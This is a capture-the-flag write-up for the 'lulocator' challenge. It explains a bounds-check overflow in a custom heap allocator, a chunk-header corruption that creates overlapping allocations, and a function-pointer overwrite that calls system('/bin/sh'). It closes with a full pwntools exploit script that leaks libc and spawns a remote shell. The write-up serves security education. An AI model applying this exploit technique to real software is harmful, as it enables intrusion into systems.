lulocator
Challenge
"Who needs that buggy malloc? Made my own completely safe lulocator."
We are given a stripped ELF 64-bit binary with a custom heap allocator backed by mmap, along with the challenge libc. The binary has No PIE, No RELRO, No Canary, and NX enabled.
Binary Analysis
The program provides a menu with 7 operations:
- new - Allocates an object with a custom allocator, stores pointer in a slots array (max 16 slots)
- write - Reads data from stdin into an object's data buffer
- delete - Frees an object and NULLs its slot
- info - Prints the object's address, output stream pointer (stdout), and length
- set_runner - Stores a slot's object pointer into a global runner variable
- run - Calls runner->func_ptr(runner + 0x28) (function pointer stored at offset 0x10 of the object)
- quit - Exits
Object Layout (at address returned by allocator)
| Offset | Size | Field |
|---|---|---|
| +0x00 | 8 | field0 (unused, init to 0) |
| +0x08 | 8 | field1 (unused, init to 0) |
| +0x10 | 8 | func_ptr (initialized to a print function at 0x401608) |
| +0x18 | 8 | output stream (FILE* stdout) |
| +0x20 | 8 | length (user-requested size) |
| +0x28 | N | user data buffer |
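To make the offsets concrete, the table can be mirrored with Python's struct module. This is only a sketch: the helper names build_object and parse_object are hypothetical, and the stdout value is a made-up placeholder rather than a real leak.

```python
import struct

# Field order follows the layout table: field0, field1, func_ptr, out, length.
OBJ_HEADER = struct.Struct("<5Q")   # five little-endian 64-bit fields
DATA_OFFSET = OBJ_HEADER.size       # user data starts right after them (0x28)

def build_object(func_ptr, out, data):
    """Serialize an object the way the table describes it (hypothetical helper)."""
    return OBJ_HEADER.pack(0, 0, func_ptr, out, len(data)) + data

def parse_object(raw):
    """Split raw object bytes back into named fields (hypothetical helper)."""
    _field0, _field1, func_ptr, out, length = OBJ_HEADER.unpack_from(raw, 0)
    return {
        "func_ptr": func_ptr,
        "out": out,
        "length": length,
        "data": raw[DATA_OFFSET:DATA_OFFSET + length],
    }

# 0x401608 is the print function from the table; the stdout pointer is a placeholder.
obj = build_object(0x401608, 0x7ffff7e1a780, b"/bin/sh\x00")
fields = parse_object(obj)
print(hex(DATA_OFFSET), hex(fields["func_ptr"]), fields["data"])
```

The same offsets (0x10 for func_ptr, 0x28 for the data buffer) are the ones the exploit relies on later.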
Custom Allocator
- Arena: 0x40000 bytes allocated via mmap(PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON)
- Bump allocation for new chunks, doubly-linked circular free list for freed chunks
- Chunk header: 8 bytes before the data area, stores aligned_size | in_use_bit
- Aligned size = align_up(request_size + 8, 16) with minimum 0x28
- Free list has integrity checks (corrupted free list detection, double-free detection)
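The size rule can be checked with a few lines of Python. This sketch assumes that request_size is the whole object (the 0x28 bytes of fields plus the user-requested length), which is what the 0x40 and 0x50 chunk sizes used later in this writeup imply. The function names are illustrative, not taken from the binary.

```python
HEADER_SIZE = 8     # chunk header that precedes the object
OBJ_FIELDS = 0x28   # five 8-byte object fields before the user data
MIN_CHUNK = 0x28    # minimum chunk size
IN_USE = 1          # low bit of the header word

def align_up(value, alignment):
    """Round value up to the next multiple of alignment (a power of two)."""
    return (value + alignment - 1) & ~(alignment - 1)

def chunk_size(user_size):
    # Assumption: the allocator is asked for the object fields plus the user data.
    request = OBJ_FIELDS + user_size
    return max(align_up(request + HEADER_SIZE, 16), MIN_CHUNK)

def header_word(user_size, in_use=True):
    """Value stored in the 8-byte chunk header: aligned_size | in_use_bit."""
    return chunk_size(user_size) | (IN_USE if in_use else 0)

for size in (0x10, 0x18, 0x20):
    print(hex(size), hex(chunk_size(size)), hex(header_word(size)))
```

Under this assumption a size-0x10 object occupies a 0x40 chunk whose header reads 0x41, and a size-0x20 object occupies a 0x50 chunk.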
Vulnerability: Heap Buffer Overflow
The write command has a bounds check bug. It allows writing up to obj->length + 0x17 (23 extra) bytes into the data buffer at obj + 0x28, but the actual allocated data area may be smaller than that, depending on alignment.
// Pseudocode of the bounds check in write
if (user_len >= obj->length + 0x18) {
    puts("too long");  // rejected
}
// otherwise up to obj->length + 0x17 bytes are read into obj + 0x28
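When the allocation is perfectly aligned (e.g., size % 16 == 0, so the 0x28 bytes of object fields, the data, and the 8-byte header already add up to a multiple of 16), there is zero padding after the data buffer, and the full 23 bytes overflow into the adjacent chunk. This overflow covers: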
- 8 bytes of the next chunk's size header
- 15 bytes of the next chunk's object fields (offsets 0x00 through 0x0E)
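How far the overflow reaches for a given size can be estimated as follows. This is a sketch under the same assumption as the size rule above (request = 0x28 + user size, plus an 8-byte header, rounded up to 16). The function name overflow_reach is hypothetical.

```python
HEADER_SIZE = 8
OBJ_FIELDS = 0x28
EXTRA = 0x17  # the check accepts lengths up to obj->length + 0x17

def overflow_reach(user_size):
    """Return (padding, header_bytes, field_bytes) for the largest accepted write."""
    used = HEADER_SIZE + OBJ_FIELDS + user_size
    chunk = (used + 15) & ~15
    padding = chunk - used                  # slack between data end and next header
    past_chunk = max(0, EXTRA - padding)    # bytes that land in the next chunk
    header_bytes = min(HEADER_SIZE, past_chunk)
    field_bytes = past_chunk - header_bytes
    return padding, header_bytes, field_bytes

for size in (0x10, 0x18, 0x11):
    print(hex(size), overflow_reach(size))
```

For size 0x10 there is no padding, so all 8 header bytes and 15 bytes of object fields are reachable. For size 0x11 the 15 bytes of padding absorb most of the overflow and only the header is reachable.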
Exploitation Strategy
The key insight is that by corrupting an adjacent chunk's size header, we can create overlapping allocations when the chunk is freed and reallocated.
Step-by-Step
1. Allocate three adjacent chunks A (slot 0), B (slot 1), C (slot 2), each with size 0x10.
2. Leak libc via info(0) - the out field at obj+0x18 contains a pointer to stdout (a libc address: _IO_2_1_stdout_). Compute libc_base and the address of system().
3. Set runner to C via set_runner(2) - the global runner variable now holds C's address.
4. Write "/bin/sh\0" to C - this goes to C+0x28, which run() will later pass as the argument to the function pointer.
5. Overflow from A into B's chunk header - write 16 bytes of padding + p64(0x101) to change B's apparent chunk size from 0x40 to 0x100 (with the in_use bit set).
6. Free B - the allocator now believes B is a 0x100-byte free chunk, much larger than its actual 0x40 bytes.
7. Allocate D (size 0x20) - the allocator finds B's "large" free chunk and allocates from it. The allocation takes the first 0x50 bytes, and the allocator splits the remainder (0xB0 bytes) into a new free chunk starting at C+0x08. This remainder overlaps with C's object fields.
8. Write through D to overflow into C's memory. D's user data starts at offset 0x28 from D. C's function pointer (C+0x10) is exactly 40 bytes from D's user data start. We write: 32 bytes of D's data + 8 bytes of padding + 8 bytes of system() address. This overwrites C+0x10 (the func_ptr) with system.
9. Call run() - this executes runner->func_ptr(runner + 0x28), which is now system("/bin/sh"), giving us a shell.
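The offsets quoted in the steps above can be rechecked with arena-relative arithmetic. This is a sketch, not the allocator's code: it assumes the first chunk header sits at offset 0 of the arena and that the split simply subtracts D's chunk size from the forged size.

```python
CHUNK_HDR = 8        # header in front of every object
DATA_OFF = 0x28      # user data offset inside an object
FUNC_PTR_OFF = 0x10  # func_ptr offset inside an object

def chunk_size(user_size):
    """Header + object fields + data, rounded up to 16 (assumed size rule)."""
    return (CHUNK_HDR + DATA_OFF + user_size + 15) & ~15

# Three size-0x10 chunks laid out back to back from the start of the arena.
a_hdr = 0x00
b_hdr = a_hdr + chunk_size(0x10)
c_hdr = b_hdr + chunk_size(0x10)
c_obj = c_hdr + CHUNK_HDR

# After the overflow, B's header reads 0x101: size 0x100 with the in_use bit.
fake_b_size = 0x101 & ~1

# D (size 0x20) is carved from the start of the forged chunk.
d_chunk = chunk_size(0x20)
remainder_hdr = b_hdr + d_chunk
remainder_size = fake_b_size - d_chunk

# Distance from D's data buffer to C's function pointer.
d_data = b_hdr + CHUNK_HDR + DATA_OFF
c_func_ptr = c_obj + FUNC_PTR_OFF
gap = c_func_ptr - d_data

print(hex(remainder_hdr - c_obj), hex(remainder_size), gap)
```

The payload needs gap + 8 = 48 bytes, which stays below the 0x20 + 0x18 = 56 byte limit that the write check enforces for D.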
Memory Layout Diagram
Before corruption:
[A header][A object (0x38 bytes)][B header][B object (0x38 bytes)][C header][C object]
base+0    base+8                 base+0x40 base+0x48              base+0x80 base+0x88
After step 5 (overflow from A):
[A header][A data... AAAA...][0x101   ][B object            ][C header][C object]
                             ^corrupted B header (was 0x41)
After step 7 (alloc D from "big" B):
[A chunk ][D header][D object (0x48 bytes)][remainder hdr][remainder...]
                                           ^base+0x90 = C+0x08
                                                          ^C+0x10 = func_ptr (in remainder)
After step 8 (write through D):
D's write data: [DDDDD...32 bytes...][00000000][system_addr]
Lands at:       D+0x28               C+0x08    C+0x10 (func_ptr!)
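The effect of the final write on C can also be replayed on a plain bytearray. This is a simplified model: offsets are arena-relative as in the diagrams, both libc addresses are made-up placeholders, and whatever the allocator itself wrote into the remainder chunk during the split is ignored.

```python
import struct

arena = bytearray(0x140)
C_HDR, C_OBJ, D_DATA = 0x80, 0x88, 0x70   # offsets taken from the diagrams
FAKE_STDOUT = 0x7ffff7e1a780              # placeholder, not a real leak
FAKE_SYSTEM = 0x7ffff7c50d70              # placeholder, not a real address

# C before the write: header 0x41, print function at +0x10, "/bin/sh" at +0x28.
struct.pack_into("<Q", arena, C_HDR, 0x41)
struct.pack_into("<5Q", arena, C_OBJ, 0, 0, 0x401608, FAKE_STDOUT, 0x10)
arena[C_OBJ + 0x28:C_OBJ + 0x30] = b"/bin/sh\x00"

# The payload from step 8, written at D's data buffer.
payload = b"D" * 0x20 + struct.pack("<QQ", 0, FAKE_SYSTEM)
arena[D_DATA:D_DATA + len(payload)] = payload

func_ptr, out = struct.unpack_from("<2Q", arena, C_OBJ + 0x10)
arg = bytes(arena[C_OBJ + 0x28:C_OBJ + 0x30])
print(hex(func_ptr), hex(out), arg)
```

In this model the write clobbers C's chunk header, field0 and field1 along with func_ptr, while the out pointer, the length, and the "/bin/sh" string at C+0x28 stay intact.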
Exploit Code
from pwn import *

p = remote('chall.ehax.in', 40137)
libc = ELF('./libc.so.6', checksec=False)

# Helper functions for menu interaction
def new(sz):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'size: ', str(sz).encode())
    return p.recvline()

def write_data(idx, data):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.sendlineafter(b'len: ', str(len(data)).encode())
    p.sendafter(b'data: ', data)
    return p.recvline()

def delete(idx):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'idx: ', str(idx).encode())
    return p.recvline()

def info(idx):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b'idx: ', str(idx).encode())
    return p.recvline()

def set_runner(idx):
    p.sendlineafter(b'> ', b'5')
    p.sendlineafter(b'idx: ', str(idx).encode())
    return p.recvline()

new(0x10); new(0x10); new(0x10)                    # A=slot0, B=slot1, C=slot2
stdout_addr = int(info(0).split(b'out=')[1].split(b' ')[0], 16)
libc_base = stdout_addr - libc.symbols['_IO_2_1_stdout_']
system_addr = libc_base + libc.symbols['system']
set_runner(2)                                      # runner -> C
write_data(2, b'/bin/sh\x00')                      # C+0x28 = "/bin/sh"
write_data(0, b'A'*0x10 + p64(0x101))              # corrupt B header: size=0x100
delete(1)                                          # free "big" B
new(0x20)                                          # D=slot1, overlaps C
write_data(1, b'D'*0x20 + p64(0) + p64(system_addr))  # overwrite C+0x10 = system
p.sendlineafter(b'> ', b'6')                       # run() -> system("/bin/sh")
p.interactive()